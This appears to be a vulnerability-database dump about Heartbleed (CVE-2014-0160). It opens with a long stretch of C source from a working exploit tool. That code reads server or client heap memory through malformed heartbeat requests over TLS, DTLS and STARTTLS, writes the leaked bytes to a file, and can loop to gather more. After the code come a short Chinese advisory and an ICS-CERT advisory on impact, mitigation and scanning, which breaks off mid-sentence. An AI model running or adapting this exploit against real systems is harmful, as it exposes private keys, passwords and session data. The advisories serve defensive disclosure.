(EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255"}, {"lastseen": "2017-11-19T17:26:32", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nAttachmate Reflection\u662f\u4e00\u6b3e\u4f18\u79c0\u7684Unix\u7ec8\u7aef\u4eff\u771f\u8f6f\u4ef6\u3002\r\n\r\nAttachmate Reflection\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nAttachmate Reflection 14.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.attachmate.com/", "modified": "2014-04-16T00:00:00", "published": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62180", "id": "SSV:62180", "title": "Attachmate Reflection OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "ics": [{"lastseen": "2019-10-23T22:47:51", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis advisory is a follow-up to the updated alert titled ICS-ALERT-14-099-01E Situational Awareness Alert for OpenSSL Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nThe OpenSSL (Heartbleed) vulnerability was independently identified by both Neel Mehta of Google Security on April 1, 2014, and 2 days later by a team of security engineers Riku, Antti, and Matti at Codenomicon.a b The OpenSSL (Heartbleed) vulnerability has been identified in OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1 that contain a flaw in the implementation of the transport layer security/datagram transport layer security (TLS/DTLS) heartbeat functionality. OpenSSL Version 1.0.1g addresses and mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following OpenSSL libraries are affected:\n\n * OpenSSL Versions 1.0.1 through 1.0.1f and 1.0.2-beta1\n\nICS-CERT has produced an OpenSSL affected/unaffected products list that specifies which vendors, products, and product versions are affected by the OpenSSL vulnerability. This document also contains a list of vendors, products, and product versions that has evaluated their products and have asserted that their products are not affected by the OpenSSL vulnerability. This document will be updated as needed. The location of this document is as follows:\n\nhttps://ics-cert.us-cert.gov/file_attach/ICSA-14-135-05.xlsx\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nThe OpenSSL Project is an ongoing volunteer-driven collaborative multinational development effort for the [Open Source](<http://www.opensource.org/>) toolkit, implementing the s[ecure sockets layer](<http://www.netscape.com/eng/ssl3/>) (SSL) and TLS protocols, as well as a general purpose cryptography library. The Open Source toolkit is known to be deployed in some secure communication devices used in ICS networks.\n\nThe ideal ICS network is isolated from the enterprise network and contains little to no external communication connections; however, business demands are requiring increased communication with the ICS network from external networks. These external communication connections are susceptible to the OpenSSL vulnerability, which could be used to exfiltrate credentials for access to components on the ICS network. The OpenSSL vulnerability can be present in hosts, clients, and client software. If ICS network credentials are exfiltrated, which can be done with the successful exploitation of the OpenSSL vulnerability, it is possible for an attacker to exercise substantial control over an ICS network. It is extremely common for a set of ICS credentials to have nearly unlimited access throughout the ICS network, which is different from IT networks that typically limit user access to execute job specific duties.\n\nExternal connections commonly used in the ICS network include VPN connections, database and web interfaces, and secure FTP and other secure data transfer connections. There are three general guidelines that can be applied to determine a starting point for evaluating ICS networks for the OpenSSL vulnerability:\n\n 1. Any component connected to the ICS network that offers secure external communication should be evaluated;\n 2. Any component connected to the ICS network that was deployed or last updated prior to 2012 will not have the OpenSSL vulnerability because the OpenSSL vulnerability did not exist prior to 2012; and\n 3. Any component connected to the ICS network that is based on Microsoft technologies may not be vulnerable because Microsoft does not typically use OpenSSL.\n\nSpecific types of networking equipment have been determined to be more likely to contain the OpenSSL vulnerability and they are as follows:\n\n * Network gear that is managed;\n * Communication gear that encrypts;\n * PLCs with built in Ethernet/web cards with secure web connections;\n * PLCs with add-on Ethernet/web cards with secure web connections;\n * Database and web interfaces to customers, vendors, and enterprise resource planning interfaces;\n * Secure data transfer servers; and\n * Virtual private network connections directly into ICS networks or routed through the enterprise firewalls into ICS networks.\n\nAsset owners and operators that are unsure of the vulnerability of ICS networking equipment or if they suspect networking equipment of containing the OpenSSL vulnerability, should contact their product vendor.\n\nICS-CERT is tracking products affected by the OpenSSL vulnerability in the OpenSSL affected/unaffected products list. In regards to the products ICS-CERT is currently working with, the ratio of affected products to products not affected is small; however, the OpenSSL vulnerability is known to affect a large number of traditional IT-based secure communication equipment. The OpenSSL toolkit is deployed globally.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### OUT OF BOUNDS READc\n\nA flaw in the implementation of OpenSSL could allow the private key used in SSL to be exposed. An attacker could then decrypt and read any secure data passed on the network link.\n\nThe vulnerability exists in the Heartbeat extension (RFC6520) of OpenSSL\u2019s TLS and the DTLS protocols. The Heartbeat extension is functionally a \u201ckeep-alive\u201d between end-users and the secure server. It works by sending periodic \u201cdata pulses\u201d of 64 KB in size to the secure server, and once the server receives that data; it reciprocates by resending the same data at the same size.d\n\nThe out-of-bounds \u201cread\u201d vulnerability exists because the Heartbeat extension does not properly validate the data being sent from the end-user. As a result, a malicious actor could send a specially crafted Heartbeat request to the vulnerable server and obtain sensitive information stored in memory on the server. Furthermore, even though each heartbeat only allows requests to have a data size limited to 64 kB segments, it is possible to send repeated requests to retrieve more 64 kB segments, which could include encryption keys used for certificates, passwords, usernames, and even sensitive content that were stored at the time. An attacker could harvest enough data from the 64 kB segments to piece together larger groupings of information, which could help an attacker develop a broader understanding of the information being acquired.e\n\nCVE-2014-0160f has been assigned. A CVSS score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).g\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill level would be able to exploit this vulnerability with publicly available information, tutorials, and exploit tools.\n\n## MITIGATION\n\nOpenSSL Version 1.0.1g has addressed and mitigates this vulnerability. Asset owners and operators should contact their product vendor to check for availability of updates. Any system that may be affected by this vulnerability should regenerate any credential information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items.\n\nOlder versions of OpenSSL may not be vulnerable to the Heartbleed attacks, but have other known vulnerabilities that could be exploited. ICS-CERT strongly suggests that asset owners and operators verify what versions are running in the products being used in their facilities and then reference the following web site to determine which patched versions of OpenSSL should be used for the most secure operation. If there are still questions about what version is being used, contact the product vendor for verification.\n\n<http://www.openssl.org/news/vulnerabilities.html>\n\n## DEVELOPERS\n\nUpgrade affected TLS/TDLS clients and servers to OpenSSL Version 1.0.1g. Alternatively, affected versions of OpenSSL may be recompiled with the option \n\u201c-DOPENSSL_NO_HEARTBEATS\u201d to mitigate the vulnerability until an upgrade can be performed.\n\n## OPENSSL SCANNING IN ICS ENVIRONMENTS\n\nAsset owners and operators may need to scan the devices used in their ICS environment if they implement end-of-life devices or their vendor is not communicating with them on this issue. Scanning can be completed in two different ways, active and passive scanning. Both scanning methods are dangerous when used in an ICS environment due to the sensitive nature of these devices. ICS-CERT advises that all scanning of ICS devices for Heartbleed be done in an isolated test laboratory, not in the production environment. If a test environment is not available then the device vendor should be contacted. When it is possible to scan the device, it is possible that device could be put into invalid state causing unexpected results and possible failure of safety safeguards.\n\nScanning of the VPN used to connect into ICS environments should be the highest priority. If a VPN is vulnerable to Heartbleed, it is possible for an attacker to retrieve the information required to hijack a current user\u2019s session and circumvent any form of authentication used by the VPN, including two-factor authentication.\n\nActively attempting to exploit the OpenSSL vulnerability is the quickest and most reliable method for identifying vulnerable systems, but it is also the most dangerous method of scanning. Multiple tools and scripts have been written to only request 16 kB and to check if a longer than normal Heartbeat request is returned. There are numerous OpenSSL scanning tools available and three free to use active-scanning tools that accurately identify the presence of the OpenSSL vulnerability include: CrowdStrike Heartbleed Scanner, Nmap NSE Script for Heartbleed, and Heartbleed-POC.py.\n\nThe CrowdStrike Heartbleed Scanner (<http://www.crowdstrike.com/community-tools/index.html>) is a Windows application that scans multiple hosts concurrently and provides a clear vulnerable/not-vulnerable indicator for each host scanned. An Nmap NSE Script for Heartbleed is available for Windows, OS X, and Linux/Unix (ICS-CERT has only tested the script on Linux) allowing for testing a large number of hosts at once. Finally, an open source python script called \u201cHeartbleed-POC.py\u201d provides a method of scanning a single host. The latter two scripts can be found at (<https://github.com/sensepost/heartbleed-poc>).\n\nA lower-risk method is passively scanning for devices that are susceptible to this attack. This approach could involve submitting devices\u2019 firmware and SSL applications to online code scanners or capturing and analyzing network traffic. Codenomicon released a web application that will scan small firmware updates or applications to determine if a vulnerable version of OpenSSL is used. This is the only method known to be safe for ICS environments but requires knowledge of the firmware version used on all devices and the ability to 